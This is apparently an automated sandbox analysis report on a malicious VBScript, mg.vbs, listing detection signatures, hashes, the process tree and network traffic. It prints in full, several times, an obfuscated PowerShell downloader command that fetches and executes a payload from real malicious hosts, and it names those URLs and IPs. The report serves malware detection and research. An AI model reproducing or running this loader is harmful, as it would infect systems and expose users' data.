Windows Analysis Report
mg.vbs

Overview

General Information

Sample name: mg.vbs
Analysis ID: 1569002
MD5: 8df76af54c38d5d4c2cd9f6d18eedf92
SHA1: b21c95ebf34440ad8da30f6e4fe25badb871d61a
SHA256: 2fd9440e21adf91473719e9fb085f4d47a1d5afcf02333a7f04d2a0f4d0b1c77
Tags: Listofrequireditems, vbs, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • wscript.exe (PID: 6864 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. 
SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. 
CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. 
') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. 
');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4856 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 7016 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_7016.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

      System Summary

      Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs", ProcessId: 6864, ProcessName: wscript.exe
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$Fra
      Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs", ProcessId: 6864, ProcessName: wscript.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$Fra
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-05T10:41:52.827105+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 184.171.244.231 | 443 | TCP

      AV Detection

      Source: http://www.erp-royal-crown.info | Avira URL Cloud: Label: phishing
      Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.smiX | Avira URL Cloud: Label: phishing
      Source: https://www.erp-royal-crown.info | Avira URL Cloud: Label: phishing
      Source: http://erp-royal-crown.info | Avira URL Cloud: Label: phishing
      Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.smi | Avira URL Cloud: Label: malware
      Source: https://www.almrwad.com/wh/Subordinerendes78.smi | Avira URL Cloud: Label: malware
      Source: mg.vbs | ReversingLabs: Detection: 34%
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.9% probability
      Source: unknown | HTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: Binary string: ystem.pdbM source: powershell.exe, 00000001.00000002.3005157693.00000273D325E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.3005157693.00000273D31D4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.3005157693.00000273D31D4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000001.00000002.3005157693.00000273D31F4000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
      Source: Joe Sandbox View | IP Address: 148.251.114.233 148.251.114.233
      Source: Joe Sandbox View | IP Address: 184.171.244.231 184.171.244.231
      Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 184.171.244.231:443
      Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.almrwad.com | Connection: Keep-Alive
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic | DNS traffic detected: DNS query: www.almrwad.com
      Source: global traffic | DNS traffic detected: DNS query: www.erp-royal-crown.info
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:41:46 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:41:52 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:41:58 GMT | server: LiteSpeed
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:42:04 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:42:10 GMT | server: LiteSpeed
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:42:16 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:42:22 GMT | server: LiteSpeed
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:42:28 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
